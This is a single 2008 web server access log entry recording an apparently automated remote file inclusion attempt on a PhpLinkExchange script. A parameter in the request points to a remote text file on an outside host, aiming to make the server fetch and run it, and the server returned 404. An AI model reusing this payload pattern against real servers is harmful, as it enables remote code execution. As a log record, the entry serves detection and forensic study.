200.48.204.130 - - [07/Apr/2008:13:49:47 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
